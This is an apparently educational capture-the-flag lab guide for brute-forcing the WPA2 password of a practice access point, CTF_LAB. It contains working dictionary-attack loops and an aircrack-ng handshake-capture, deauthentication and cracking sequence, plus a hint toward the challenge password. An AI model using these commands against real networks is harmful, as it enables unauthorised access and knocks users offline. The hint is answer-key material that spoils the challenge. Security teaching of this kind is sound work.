In this lab, you will learn how to brute force the WiFi credentials of the CTF_LAB access point. This is the first challenge in the WiFi CTF competition and teaches fundamental concepts of password security and dictionary attacks.
Challenge Objectives:
- [ ] Find the wifi network
- [ ] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
BEFORE YOU START
Prerequisites:
- The CTF Lab Raspberry Pi must be powered on and running
- The WiFi Access Point should be broadcasting (wait ~1-2 minutes after power-on)
- You should have a laptop or mobile device capable of WiFi scanning
- IMPORTANT: DO NOT PERFORM THIS WORK ON A CORPORATE OR MANAGED LAPTOP. Use a personal computer you own, as security/IT teams may flag hacking tools as malicious software
What You’ll Learn:
- WiFi network reconnaissance
- Password dictionary attacks
- Command-line automation with loops
- The importance of strong passwords
Discovering the WiFi Network
The Raspberry Pi CTF Lab operates as a WiFi access point that you can practice ethical hacking against. About 1-2 minutes after it is powered on, it will broadcast a WiFi network with the SSID (network name):
CTF_LAB
Finding the Network
You can discover this network from any WiFi-capable device:
On Mobile Devices (iOS/Android):
- Open Settings → WiFi
- Look for the network named `CTF_LAB` in the available networks list
On Mac:
- Click the WiFi icon in the menu bar
- Look for `CTF_LAB` in the network list
On Linux:
# Scan for available networks
nmcli device wifi list
# Or use iwlist
sudo iwlist wlan0 scan | grep -i "ctf_lab"
On Windows:
- Click the WiFi icon in the system tray
- Look for `CTF_LAB` in the available networks
Progress:
- [x] Find the wifi network
- [ ] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Manually Guessing a Password
Now that you’ve found the CTF_LAB network, you can try connecting with some common passwords. Try a few guesses manually:
- `password`
- `12345678`
- `admin`
- `ctf`
- `supervisor`
Unless you’re very lucky (or very strategic), you probably won’t guess it immediately. This demonstrates an important security principle: password strength matters.
Why Dictionary Attacks Work
You might wonder why manual guessing is ineffective, but a dictionary attack can succeed. Here’s the key insight:
Password Space vs. Memorable Passwords
- Total possible passwords: With lowercase letters, uppercase, numbers, and symbols, an 8-character password has over 200 trillion possible combinations
- Memorable passwords: Most people choose passwords they can remember, which drastically reduces the search space to maybe a few million common choices
Since humans tend to use memorable passwords (dictionary words, names, common phrases), attackers can:
- Start with a list of commonly used passwords
- Try these first before resorting to true brute force
- Often succeed without testing billions of random combinations
This is why password managers and randomly generated passwords are so important for real security!
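The same idea from the defender's side, as an added example that is not part of the original lab: before setting a passphrase on an access point, check that it is not in the list an attacker would try first. The function name `audit_psk`, its verdict strings and the five-word sample list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the lab): audit a proposed WPA2 passphrase.
# Prints one verdict: invalid-length | listed | listed-plus-digits | not-listed

audit_psk() {
    wordlist=$1
    psk=$2
    # WPA2-PSK passphrases are 8 to 63 characters long.
    if [ "${#psk}" -lt 8 ] || [ "${#psk}" -gt 63 ]; then
        echo "invalid-length"
        return 0
    fi
    # -F literal match, -x whole line, -i ignore case, -q no output.
    if grep -Fxiq -e "$psk" "$wordlist"; then
        echo "listed"
        return 0
    fi
    # People often append digits to a common word ("sunshine2024").
    base=$(printf '%s\n' "$psk" | sed 's/[0-9]*$//')
    if [ -n "$base" ] && [ "$base" != "$psk" ] &&
       grep -Fxiq -e "$base" "$wordlist"; then
        echo "listed-plus-digits"
        return 0
    fi
    echo "not-listed"
}

# Constructed five-line sample standing in for 10k-most-common.txt.
SAMPLE_LIST=$(mktemp)
trap 'rm -f "$SAMPLE_LIST"' EXIT
printf '%s\n' password 12345678 sunshine football dragon > "$SAMPLE_LIST"

for candidate in dragon Sunshine football99 'kX7#pq!2vLm9'; do
    printf '%-14s %s\n' "$candidate" "$(audit_psk "$SAMPLE_LIST" "$candidate")"
done
```

To audit against the real list, pass the path to `10k-most-common.txt` in place of `$SAMPLE_LIST`.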
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [ ] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Finding a Dictionary
Let’s try to find a common password list. You can do this by searching Google for the following phrase:
“10k most common passwords”
You should see a link to a GitHub repository at the following URL:
Browse to the page. Click on the button labeled “raw” on the right side of the page. You can then save this file to your computer by clicking on the file menu for the browser and selecting “save as.”

When you click on Save as, a dialog will show up:

You’ll need to create a directory to hold the files for this lab. You can do this from within the dialog by clicking on New Folder. Name it HackingLab and click Create.

Then go ahead and click on Save. You’ll now have a file called “10k-most-common.txt” in the HackingLab directory. Let’s learn to view the file from the command line. Use Spotlight to open the terminal by hitting Command and Space simultaneously, and then typing in terminal:

Change into your HackingLab directory by typing the following:
cd HackingLab
Now that you’re in the HackingLab directory, let’s view the password file:
more 10k-most-common.txt
You’ll see that each row of the file contains a password.

Hit q to leave the more command.
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [ ] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Finding a Command to Connect to WiFi Networks
Now we have a password list – we need to figure out how to automate connection attempts. The approach varies by operating system:
Mac OS
Search Google for “Connect to wifi from command line mac” to find resources. Here are the key commands:
Scan for networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
Connect to a network:
networksetup -setairportnetwork en0 <SSID_OF_NETWORK> <PASSWORD>
Try running the airport -s command to see available networks. You should see CTF_LAB in the list.
Testing a single password:
networksetup -setairportnetwork en0 CTF_LAB somepassword
When you run this, your WiFi will disconnect temporarily. If the password is wrong, you’ll see an error message.
Linux
Using nmcli (NetworkManager):
# Scan for networks
nmcli device wifi list
# Connect to network
nmcli device wifi connect CTF_LAB password somepassword
Using wpa_supplicant (manual):
# Create config
wpa_passphrase CTF_LAB somepassword > /tmp/wpa.conf
# Connect
sudo wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf
Windows (PowerShell)
# View available networks
netsh wlan show networks
# Connect to network
netsh wlan connect name="CTF_LAB"
For automated password testing on Windows, you’ll need to create a WiFi profile XML file for each password attempt, which is more complex than on Mac/Linux.
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [x] Find a command to use to connect to wifi networks
- [ ] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [ ] Launch the attack and discover the credential
Automating the Dictionary Attack
Now for the exciting part – we’ll automate the password testing using a loop that tries each password from our dictionary file!
Mac OS Script
At the terminal, type the following lines and hit Enter at the end of each line:
while read passwordfilevalue; do
    networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"
    echo "Tried password: $passwordfilevalue"
    ifconfig en0 | grep inet
done < 10k-most-common.txt
What this script does:
| Command | Purpose |
|---|---|
| `while read passwordfilevalue; do` | Creates a loop that reads the password list one row at a time |
| `networksetup -setairportnetwork en0 CTF_LAB "$passwordfilevalue"` | Attempts to connect to CTF_LAB using the current password |
| `echo "Tried password: $passwordfilevalue"` | Prints the password we just tried |
| `ifconfig en0 \| grep inet` | Shows the `inet` line with the interface's IP address if the connection succeeded |
| `done < 10k-most-common.txt` | Reads from the password dictionary file |
How to detect success:
- When you see an `inet` line with an IP address (like `inet 192.168.4.100`), you’ve connected successfully!
- The password printed immediately before the IP address is the correct one
- The CTF_LAB network uses the `192.168.4.0/24` subnet, so successful connections will show an IP like `192.168.4.X`
Linux Script
while read passwordfilevalue; do
    nmcli device wifi connect CTF_LAB password "$passwordfilevalue" 2>&1
    if [ $? -eq 0 ]; then
        echo "SUCCESS! Password found: $passwordfilevalue"
        break
    else
        echo "Failed password: $passwordfilevalue"
    fi
done < 10k-most-common.txt
Advanced: Using Aircrack-ng Suite (Linux)
For a more sophisticated approach, you can capture the WPA2 handshake and crack it offline:
# 1. Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0
# 2. Scan for networks
sudo airodump-ng wlan0mon
# 3. Capture handshake (note the channel and BSSID of CTF_LAB)
sudo airodump-ng -c <channel> --bssid <BSSID> -w ctf_capture wlan0mon
# 4. In another terminal, deauth a client to force handshake
sudo aireplay-ng -0 1 -a <BSSID> wlan0mon
# 5. Once handshake is captured, crack it
aircrack-ng -w 10k-most-common.txt ctf_capture-01.cap
Progress:
- [x] Find the wifi network
- [x] Manually guess some passwords
- [x] Find a dictionary
- [x] Find a command to use to connect to wifi networks
- [x] Figure out how to push the passwords from the dictionary file into the wifi connection command
- [x] Launch the attack and discover the credential
What You Should See
As the script runs, you’ll see:
- Each password being tried
- Connection errors for wrong passwords
- When successful: An IP address in the `192.168.4.X` range appears!
The password is somewhere in that 10k common password list. Watch the output carefully to catch the successful connection.
Hint: Think about common passwords related to oversight, management, or authority. The CTF_LAB password is a common English word.
Next Steps
Once you’ve successfully connected to the CTF_LAB WiFi network, you’re ready to:
- Scan the network to find a registration resource
- Register
- Access the dashboard
- Begin exploring the web services and system challenges
- Start earning points!
Congratulations on completing your first challenge! You’ve learned:
- WiFi reconnaissance techniques
- The power of dictionary attacks
- Why password strength matters
- Basic bash scripting for automation
